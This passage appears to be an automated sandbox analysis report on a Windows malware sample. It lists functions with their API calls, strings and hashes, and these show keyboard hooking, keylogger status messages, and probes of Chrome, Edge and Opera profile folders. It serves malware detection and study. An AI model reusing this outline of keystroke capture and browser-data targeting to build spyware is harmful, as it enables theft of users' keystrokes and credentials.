            • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
            Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
            • ___raise_securityfailure.LIBCMT ref: 00432E76
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor___raise_securityfailure
            • String ID: (F
            • API String ID: 3761405300-3109638091
            • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
            • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
            • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
            • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
            Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
            Download Yara Rule
            APIs
            • GetLocalTime.KERNEL32(00000000), ref: 004194F4
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LocalTime
            • String ID: | $%02i:%02i:%02i:%03i
            • API String ID: 481472006-2430845779
            • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
            • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
            • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
            • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
            Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
            Download Yara Rule
            APIs
            • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: alarm.wav$x(G
            • API String ID: 1174141254-2413638199
            • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
            • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
            • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
            • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
            Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • CloseHandle.KERNEL32(?), ref: 00409FFD
            • UnhookWindowsHookEx.USER32 ref: 0040A010
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
            • String ID: Online Keylogger Stopped
            • API String ID: 1623830855-1496645233
            • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
            • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
            • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
            • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
            Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
            Download Yara Rule
            APIs
            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
            • API String ID: 1174141254-2800177040
            • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
            • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
            • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
            • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
            Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
            Download Yara Rule
            APIs
            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: UserProfile$\AppData\Local\Google\Chrome\
            • API String ID: 1174141254-4188645398
            • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
            • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
            • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
            • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
            Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
            Download Yara Rule
            APIs
            • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: AppData$\Opera Software\Opera Stable\
            • API String ID: 1174141254-1629609700
            • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
            • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
            • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
            • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
            Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
            Download Yara Rule
            APIs
            • GetKeyState.USER32(00000011), ref: 0040A597
              • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
              • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
              • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
              • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
              • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
              • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
            • String ID: [AltL]$[AltR]
            • API String ID: 3195419117-2658077756
            • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
            • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
            • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
            • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
            Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
            Download Yara Rule
            APIs
            • GetKeyState.USER32(00000012), ref: 0040A5F1
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: State
            • String ID: [CtrlL]$[CtrlR]
            • API String ID: 1649606143-2446555240
            • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
            • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
            • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
            • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
            Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
            Download Yara Rule
            APIs
            • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
            • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DeleteOpenValue
            • String ID: 6h@
            • API String ID: 2654517830-73392143
            • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
            • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
            • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
            • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
            Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
            • GetLastError.KERNEL32 ref: 0043B4E9
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$ErrorLast
            • String ID:
            • API String ID: 1717984340-0
            • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
            • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
            • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
            • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
            Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
            Download Yara Rule
            APIs
            • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00410955), ref: 004105F1
            • IsBadReadPtr.KERNEL32(?,00000014,00410955), ref: 004106BD
            • SetLastError.KERNEL32(0000007F), ref: 004106DF
            • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastRead
            • String ID:
            • API String ID: 4100373531-0
            • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
            • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
            • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
            • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19